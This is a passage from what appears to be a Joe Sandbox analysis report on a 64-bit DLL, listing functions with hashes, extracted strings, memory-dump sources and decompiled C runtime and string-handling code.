m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
API String ID: 0-872547024
Opcode ID: c6f11ac01cd25e5a832513a9fe89d775d122b9a7f78f41ae8ad8edaa33a11b99
Instruction ID: 7df1fb6d38155682a52115daf4bd2aa68243a452ebf40e25d5ed7dc49465037d
Opcode Fuzzy Hash: c6f11ac01cd25e5a832513a9fe89d775d122b9a7f78f41ae8ad8edaa33a11b99
Instruction Fuzzy Hash: 3AA35F1250DBC1C9E332C23CB45878FAE8193A3319F484299D3E41AADBC7AE9155DF67

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004DDC Relevance: 7.8, Strings: 6, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

w, xrefs: 00000001800050FF
Q+, xrefs: 000000018000533C
+, xrefs: 000000018000530C
3C, xrefs: 0000000180005284
@_, xrefs: 0000000180004EFC
u, xrefs: 0000000180004DEF

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: @_$Q+$w$+$3C$u
API String ID: 0-4152583413
Opcode ID: 9f8a14a22d69b5951a2631c0067e0fc4d36d0f639cba0d102428ca4f006b14de
Instruction ID: b6ea412dc30f19c74fb4b1663690e8dc750e0b49b1240d0c045de5a6b9424b82
Opcode Fuzzy Hash: 9f8a14a22d69b5951a2631c0067e0fc4d36d0f639cba0d102428ca4f006b14de
Instruction Fuzzy Hash: 7D02F67151038DEFDB98DF24C889ADD3BA1FB58398F952219FC0A972A0C774D985CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180028C94 Relevance: 6.5, Strings: 5, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3m, xrefs: 0000000180029083
r, xrefs: 0000000180028EC9
rS, xrefs: 0000000180028F00
SW, xrefs: 0000000180028CD3
t.?8, xrefs: 0000000180029073

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 3m$SW$rS$r$t.?8
API String ID: 0-4220278859
Opcode ID: 85a6ee6c84f7a60e958ee75f08787c2d87ed4ffb25c6bd77534bac28b26f7971
Instruction ID: 5729ab1ff226baa14ab4ffc9551888db56205bfd96deea9119b6bbc9091883bb
Opcode Fuzzy Hash: 85a6ee6c84f7a60e958ee75f08787c2d87ed4ffb25c6bd77534bac28b26f7971
Instruction Fuzzy Hash: F2C1EF7151A784ABD388DF28C5CA95BBBE1FBC4744F906A1DF496862A0D7B4D908CF02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005DB4 Relevance: 6.4, Strings: 5, Instructions: 189
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

iP., xrefs: 0000000180005FF3
Qz, xrefs: 0000000180005E61
9, xrefs: 0000000180005E00
>, xrefs: 0000000180005E08
cG, xrefs: 0000000180006018

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 9$>$Qz$cG$iP.
API String ID: 0-2314038544
Opcode ID: 4158940623df5b63cf90af9ecb6c971ef7c92bce548850bfcd4728ba9d0de4d2
Instruction ID: 2738067ee2515d3e4966bb770307c21824dc71e1dd538b0d2de93925eb972619
Opcode Fuzzy Hash: 4158940623df5b63cf90af9ecb6c971ef7c92bce548850bfcd4728ba9d0de4d2
Instruction Fuzzy Hash: 57815D701497888BEBE8DF24C8C5BDA7BE1FB88344F50551DF88A8B290CB75DA44CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800248E0 Relevance: 5.9, Strings: 4, Instructions: 869
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

kr, xrefs: 0000000180024E1A
V%?, xrefs: 0000000180024E1D
Rl, xrefs: 0000000180024C1F
X, xrefs: 0000000180024D35

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: Rl$X$kr$V%?
API String ID: 0-1881522904
Opcode ID: 98ff1e27a160c74632e307d872ef1a7f9803bcbde420e3daba4ce0dca79685d9
Instruction ID: 70c5aac2912e64376728126259cd49d2f789cf9a10fb17a3f2cb6be72cb14558
Opcode Fuzzy Hash: 98ff1e27a160c74632e307d872ef1a7f9803bcbde420e3daba4ce0dca79685d9
Instruction Fuzzy Hash: 59A2077051078D8FDB89CF24C88A5DE3BA0FB58398F52531DFC8AA6290D778D595CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800038A5 Relevance: 5.2, Strings: 4, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

x+MS, xrefs: 00000001800039C2
l@-T, xrefs: 0000000180003AC8
pN, xrefs: 0000000180003B71
+s, xrefs: 0000000180003B8E

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: +s$l@-T$pN$x+MS
API String ID: 0-3074933293
Opcode ID: 81be9b45353ead76c9a7b6c7e167c5c32a8ae5faee5dc8465e9a6d9c4c43a028
Instruction ID: e901c82c2c3415e94c79d9569d7d5064836046090d2f5b38374df02bf067750a
Opcode Fuzzy Hash: 81be9b45353ead76c9a7b6c7e167c5c32a8ae5faee5dc8465e9a6d9c4c43a028
Instruction Fuzzy Hash: A991597160074D8BEB59CF28C89A6DE3BA1FB58398F51422CFC4A97290CB78D655CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000B1E0 Relevance: 4.1, Strings: 3, Instructions: 302COMMON

Download Yara Rule

Strings

m[+, xrefs: 000000018000B7C8
\, xrefs: 000000018000B6EF
m)7, xrefs: 000000018000B456

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: \$m[+$m)7
API String ID: 0-1435720626
Opcode ID: af10a5be19bd77cf0563b38453e590c7ca23ba3a925fd2c55e2086c6d71307a8
Instruction ID: 883ce2ee539239a1f536d03f946b290b5c9bffedac0f26b385fd5492cb17272a
Opcode Fuzzy Hash: af10a5be19bd77cf0563b38453e590c7ca23ba3a925fd2c55e2086c6d71307a8
Instruction Fuzzy Hash: C002F6715083C88BEBFADF64C8897DE7BACFB54708F104619EA0A9E298DB745744CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800038DC Relevance: 2.6, Strings: 2, Instructions: 90COMMON

Download Yara Rule

Strings

x+MS, xrefs: 00000001800039C2
8, xrefs: 0000000180003A1F

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: x+MS$8
API String ID: 0-2879286383
Opcode ID: 0b36e420fc5be994054ff9bd7cd914dceaa5a559053905e74aaceefae8f335f5
Instruction ID: 069f65542df350c22b25c5b11342d601f1728201a4aced1865a094658918a1cd
Opcode Fuzzy Hash: 0b36e420fc5be994054ff9bd7cd914dceaa5a559053905e74aaceefae8f335f5
Instruction Fuzzy Hash: 42413B7050074D8BEB49CF28C88A6DE3FA1FB18398F61421DFD4A96290D778D598CBC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009E38 Relevance: 1.4, Strings: 1, Instructions: 177COMMON

Download Yara Rule

Strings

{6, xrefs: 000000018000A051

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: {6
API String ID: 0-1346941803
Opcode ID: 8506dbb6b1252c503813ed30af6b5c4e6b9b4570125e6fd192f6fa1e5665ff7b
Instruction ID: 4f9844d0cd30e9af067f9ce6bd73810c55f6bc83b648b6efbf776691940ba2a0
Opcode Fuzzy Hash: 8506dbb6b1252c503813ed30af6b5c4e6b9b4570125e6fd192f6fa1e5665ff7b
Instruction Fuzzy Hash: FA8126B09047098BDF48DFA8C4865EEBBF0FB48358F15821DE80AB7291D7789945CF98

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180020454 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

1, xrefs: 000000018002050B

Memory Dump Source

Source File: 00000000.00000002.322582436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: 1
API String ID: 0-4267224553
Opcode ID: 14ae2c29f1f0adff71999c81ec21c279a8b8cf5828faf7ab2494e8710ca5a4c5
Instruction ID: f864b420d3f879fa0c4a6b1c1884d968131e299f1c3c71a38cb5ded6753929e5
Opcode Fuzzy Hash: 14ae2c29f1f0adff71999c81ec21c279a8b8cf5828faf7ab2494e8710ca5a4c5
Instruction Fuzzy Hash: 4881FE705087848FD779DF28C59A6DEBBF1FB89704F004A1DEA8A8B260D7769905CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F4194 Relevance: 18.1, APIs: 12, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00007FFA7FFA094F4194(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x94f41d5;
				if (_t5 == 0) goto 0x94f41c9;
				if (_t5 == 0) goto 0x94f41bc;
				if (__edx == 1) goto 0x94f41b5;
				return 1;
			}

0x7ffa094f4198
0x7ffa094f419a
0x7ffa094f419f
0x7ffa094f41a4
0x7ffa094f41a9
0x7ffa094f41b4

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FFA094F41BC
__scrt_acquire_startup_lock.LIBCMT ref: 00007FFA094F4211
__scrt_fastfail.LIBCMT ref: 00007FFA094F422D
_RTC_Initialize.LIBCMT ref: 00007FFA094F4245
__scrt_initialize_default_local_stdio_options.LIBCMT ref: 00007FFA094F4267
__scrt_dllmain_after_initialize_c.LIBCMT ref: 00007FFA094F4283
__scrt_release_startup_lock.LIBCMT ref: 00007FFA094F42AE
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FFA094F42CD

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
String ID:
API String ID: 3885183344-0
Opcode ID: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
Instruction ID: 86fc5d1094dacb235e4cd14eacfd122ea211a6523451b8fec821db7dc5c92265
Opcode Fuzzy Hash: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
Instruction Fuzzy Hash: B4516D21E0C24385FA50AF72F9692BB2690AF5F384F44C035EA0D477A7DE2EE469C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F1580 Relevance: 10.6, APIs: 7, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFA7FFA094F1580(long long __rcx, long long __rdx, long long _a8, void* _a16) {
				char _v16;
				char _v24;
				long long _v32;
				void* _v40;
				long long _v48;
				long long _v56;
				void* _t41;
				intOrPtr* _t49;
				void* _t77;

				_a16 = __rdx;
				_a8 = __rcx;
				_v32 = 0xfffffffe;
				_t49 = _a16;
				if (_a8 == _t49) goto 0x94f1693;
				r8d = 0;
				E00007FFA7FFA094F1910(1, _t49, _a8, _t77); // executed
				if (0 == 1) goto 0x94f160a;
				E00007FFA7FFA094F1850(_a16);
				_v56 = _t49;
				E00007FFA7FFA094F1850(_a8);
				if ((E00007FFA7FFA094F2A50(_t49, _v56) & 0x000000ff) == 0) goto 0x94f160a;
				E00007FFA7FFA094F1850(_a16);
				E00007FFA7FFA094F1870(_t49, _a8, _t49);
				E00007FFA7FFA094F1850(_a16);
				_v48 = _t49;
				E00007FFA7FFA094F1850(_a8);
				if ((E00007FFA7FFA094F2A50(_t49, _v48) & 0x000000ff) == 0) goto 0x94f167a;
				E00007FFA7FFA094F1A20(_t49, _a16,  &_v24);
				_v40 = _t49;
				E00007FFA7FFA094F1AA0(_t49, _a16,  &_v16);
				_t41 = E00007FFA7FFA094F2A90(E00007FFA7FFA094F2A50(_t49, _v48) & 0x000000ff, _t49, _a8,  *_t49,  *_v40);
				goto 0x94f1693;
				E00007FFA7FFA094F2B00(_t41, _a16);
				return E00007FFA7FFA094F1F00(_t49, _a8, _t49);
			}

0x7ffa094f1580
0x7ffa094f1585
0x7ffa094f158e
0x7ffa094f1597
0x7ffa094f15a1
0x7ffa094f15a7
0x7ffa094f15b1
0x7ffa094f15bc
0x7ffa094f15c3
0x7ffa094f15c9
0x7ffa094f15d3
0x7ffa094f15ef
0x7ffa094f15f6
0x7ffa094f1604
0x7ffa094f160f
0x7ffa094f1615
0x7ffa094f161f
0x7ffa094f163b
0x7ffa094f1647
0x7ffa094f164d
0x7ffa094f165c
0x7ffa094f1672
0x7ffa094f1678
0x7ffa094f167f
0x7ffa094f169c

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F15C3
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F15D3
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F15F6

Part of subcall function 00007FFA094F1870: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F1883

Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFA094F15E4

Part of subcall function 00007FFA094F2A50: type_info::_name_internal_method.LIBCMTD ref: 00007FFA094F2A68

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F160F
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F161F
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFA094F1630

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::$EmptyQueue::StructuredWork$Affinity::operator!=Hardware$type_info::_name_internal_method
String ID:
API String ID: 1937815552-0
Opcode ID: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
Instruction ID: fe0dd003dba66e5c14f7d9d340260718416fa76171fe34d90b6450a2b3420a35
Opcode Fuzzy Hash: 954c333ac2df008955a029cb14cb6a55c87b09566746746b3e5b77c9ccfd621f
Instruction Fuzzy Hash: DD31E131A5DA4781DA10EF32F46147B6351EBCE7D0F009535E99E937A9CE2EE420C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F2600 Relevance: 9.1, APIs: 6, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E00007FFA7FFA094F2600(long long __rcx, signed int __rdx, long long __r8, long long _a8, signed int _a16, long long _a24) {
				long long _v24;
				long long _v32;
				long long _v40;
				void* _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				char _v112;
				signed long long _v120;
				void* _t82;
				signed long long _t111;
				intOrPtr* _t113;
				intOrPtr* _t114;
				long long _t115;
				intOrPtr* _t116;
				intOrPtr* _t117;
				signed long long _t118;
				long long _t120;
				long long* _t121;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				_v24 = 0xfffffffe;
				_t111 = _a16 | 0x0000000f;
				_v120 = _t111;
				E00007FFA7FFA094F2830(_t111, _a8);
				if (_t111 - _v120 >= 0) goto 0x94f2659;
				_v120 = _a16;
				goto 0x94f2736;
				_t113 = _v120;
				_v104 = _t113;
				E00007FFA7FFA094F2150(_t113, _a8);
				_t114 =  *_t113;
				if (_t114 - _v104 > 0) goto 0x94f2696;
				goto 0x94f2736;
				E00007FFA7FFA094F2150(_t114, _a8);
				_t115 =  *_t114;
				_v96 = _t115;
				E00007FFA7FFA094F2830(_t115, _a8);
				_t116 = _t115 - _v96;
				_v88 = _t116;
				E00007FFA7FFA094F2150(_t116, _a8);
				if ( *_t116 - _v88 > 0) goto 0x94f2724;
				E00007FFA7FFA094F2150(_t116, _a8);
				_t117 =  *_t116;
				_v80 = _t117;
				E00007FFA7FFA094F2150(_t117, _a8);
				_t118 = _v80 +  *_t117;
				_v120 = _t118;
				goto 0x94f2736;
				E00007FFA7FFA094F2830(_t118, _a8);
				_v120 = _t118;
				_t120 = _v120 + 1;
				_v72 = _t120;
				E00007FFA7FFA094F1850(_a8);
				E00007FFA7FFA094F28E0(_t120, _v72); // executed
				_v64 = _t120;
				_t121 = _v64;
				_v112 = _t121;
				goto 0x94f2771;
				if (_a24 <= 0) goto 0x94f27b0;
				_t82 = E00007FFA7FFA094F18F0(_t121, _a8);
				_v40 = _t121;
				E00007FFA7FFA094F2C00(_t82, _v112);
				E00007FFA7FFA094F11E0(_t121, _v40, _a24);
				r8d = 0;
				E00007FFA7FFA094F1910(1, _t121, _a8, _a24);
				E00007FFA7FFA094F2BC0(E00007FFA7FFA094F2190(_a8), _t121);
				_v32 = _t121;
				E00007FFA7FFA094F1850(_a8);
				E00007FFA7FFA094F2C10(_t121, _t121, _v32,  &_v112);
				E00007FFA7FFA094F2150(_t121, _a8);
				 *_t121 = _v120;
				return E00007FFA7FFA094F23A0(_t121, _a8, _a24);
			}

0x7ffa094f2600
0x7ffa094f2605
0x7ffa094f260a
0x7ffa094f2616
0x7ffa094f262a
0x7ffa094f262e
0x7ffa094f263b
0x7ffa094f2645
0x7ffa094f264f
0x7ffa094f2654
0x7ffa094f265b
0x7ffa094f2668
0x7ffa094f2675
0x7ffa094f267c
0x7ffa094f268f
0x7ffa094f2691
0x7ffa094f269e
0x7ffa094f26a5
0x7ffa094f26b0
0x7ffa094f26bd
0x7ffa094f26c7
0x7ffa094f26ca
0x7ffa094f26d7
0x7ffa094f26e4
0x7ffa094f26ee
0x7ffa094f26f5
0x7ffa094f2700
0x7ffa094f270d
0x7ffa094f271a
0x7ffa094f271d
0x7ffa094f2722
0x7ffa094f272c
0x7ffa094f2731
0x7ffa094f273b
0x7ffa094f273e
0x7ffa094f274b
0x7ffa094f275b
0x7ffa094f2760
0x7ffa094f2765
0x7ffa094f276a
0x7ffa094f276f
0x7ffa094f277a
0x7ffa094f2784
0x7ffa094f2789
0x7ffa094f2793
0x7ffa094f27ab
0x7ffa094f27b0
0x7ffa094f27bd
0x7ffa094f27d2
0x7ffa094f27d7
0x7ffa094f27e4
0x7ffa094f27f9
0x7ffa094f2806
0x7ffa094f2810
0x7ffa094f282f

APIs

Part of subcall function 00007FFA094F2830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F283E
Part of subcall function 00007FFA094F2830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFA094F284B

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F274B
type_info::_name_internal_method.LIBCMTD ref: 00007FFA094F275B
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFA094F2784
char_traits.LIBCPMTD ref: 00007FFA094F27AB
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F27E4
construct.LIBCPMTD ref: 00007FFA094F27F9

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::$Work$EmptyQueue::Structured$Base::$BridgeContextDispatchIdentityQueueSchedulerThrottlerchar_traitsconstructtype_info::_name_internal_method
String ID:
API String ID: 3284725307-0
Opcode ID: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
Instruction ID: e6ea9dbdbd9428fa304917c395ba0be2cf74776f9d13a516fbc2589d0444997a
Opcode Fuzzy Hash: 64b4fcb419f68d04f760d19031f3ab5cdc5356945a98713b59a62d6a36c812a5
Instruction Fuzzy Hash: B751CD2261DB8685DA60DF65F46136AA3A0FBCE790F404135EADE87B59DF7DD410CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F1910 Relevance: 7.6, APIs: 5, Instructions: 59
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 45%

			E00007FFA7FFA094F1910(signed char __edx, intOrPtr* __rax, long long __rcx, long long __r8, long long _a8, signed char _a16, long long _a24) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				void* _t32;
				intOrPtr* _t47;
				long long* _t49;

				_a24 = __r8;
				_a16 = __edx;
				_a8 = __rcx;
				if ((_a16 & 0x000000ff) != 0) goto 0x94f1930;
				goto 0x94f19f1;
				E00007FFA7FFA094F2150(__rax, _a8);
				if ( *((long long*)(__rax)) - 0x10 < 0) goto 0x94f19f1;
				E00007FFA7FFA094F2190(_a8);
				_t47 =  *((intOrPtr*)(__rax));
				_v40 = _t47;
				E00007FFA7FFA094F2BC0(E00007FFA7FFA094F2190(_a8), _t47);
				_v32 = _t47;
				E00007FFA7FFA094F1850(_a8);
				_t32 = E00007FFA7FFA094F2BD0(_t47, _v32);
				if (_a24 <= 0) goto 0x94f19bd;
				E00007FFA7FFA094F2C00(_t32, _v40);
				_v24 = _t47;
				E00007FFA7FFA094F2190(_a8);
				E00007FFA7FFA094F11E0(_t47, _v24, _a24);
				E00007FFA7FFA094F2150(_t47, _a8);
				_t49 =  *_t47 + 1;
				_v16 = _t49;
				E00007FFA7FFA094F1850(_a8);
				E00007FFA7FFA094F2100(_t49, _v40, _v16); // executed
				E00007FFA7FFA094F2150(_t49, _a8);
				 *_t49 = 0xf;
				return E00007FFA7FFA094F23A0(_t49, _a8, _a24);
			}

0x7ffa094f1910
0x7ffa094f1915
0x7ffa094f1919
0x7ffa094f1929
0x7ffa094f192b
0x7ffa094f1935
0x7ffa094f193e
0x7ffa094f1949
0x7ffa094f194e
0x7ffa094f1951
0x7ffa094f1963
0x7ffa094f1968
0x7ffa094f1972
0x7ffa094f1982
0x7ffa094f198d
0x7ffa094f1994
0x7ffa094f1999
0x7ffa094f19a3
0x7ffa094f19b8
0x7ffa094f19c2
0x7ffa094f19ca
0x7ffa094f19cd
0x7ffa094f19d7
0x7ffa094f19ec
0x7ffa094f19f6
0x7ffa094f19fb
0x7ffa094f1a15

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F1972
type_info::_name_internal_method.LIBCMTD ref: 00007FFA094F1982
char_traits.LIBCPMTD ref: 00007FFA094F19B8
Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFA094F19D7
_aligned_msize.LIBCMTD ref: 00007FFA094F19EC

Memory Dump Source

Source File: 00000000.00000002.324192093.00007FFA094F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFA094F0000, based on PE: true

Associated: 00000000.00000002.324171231.00007FFA094F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324350483.00007FFA09528000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324603423.00007FFA0956E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324624454.00007FFA09572000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324638140.00007FFA09575000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.324654744.00007FFA09577000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffa094f0000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWork$_aligned_msizechar_traitstype_info::_name_internal_method
String ID:
API String ID: 2899389904-0
Opcode ID: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
Instruction ID: 4182262753d11cde61ce136d390dd8f49f47c10d2f8b1cedac51a8bf85ae0f8c
Opcode Fuzzy Hash: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
Instruction Fuzzy Hash: 4421AC2291CA8381DA10EF62F86126EA760FBCEBD0F004035FA9E4775ADFADD450CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA094F13A0 Relevance: 7.6, APIs: 5, Instructions: 52
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00007FFA7FFA094F13A0(signed int __eax, long long __rcx, signed int __rdx, signed long long __r8, long long _a8, signed int _a16, signed long long _a24) {
				void* _v16;
				signed long long _v24;
				long long _v32;
				signed int _v40;

				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if (_a16 - 0xffffffff <= 0) goto 0x94f13cd;
				E00007FFA7FFA094F9764();
				_v24 = _a16 * _a24;
				if (_v24 - 0x1000 < 0) goto 0x94f1475;
				_v40 = _a8;
				if ((_v40 & 0x0000001f) == 0) goto 0x94f1409;
				E00007FFA7FFA094F9764();
				_v16 = _v40 - 8;
				_v32 =  *_v16;
				if (_v32 - _v40 < 0) goto 0x94f1435;
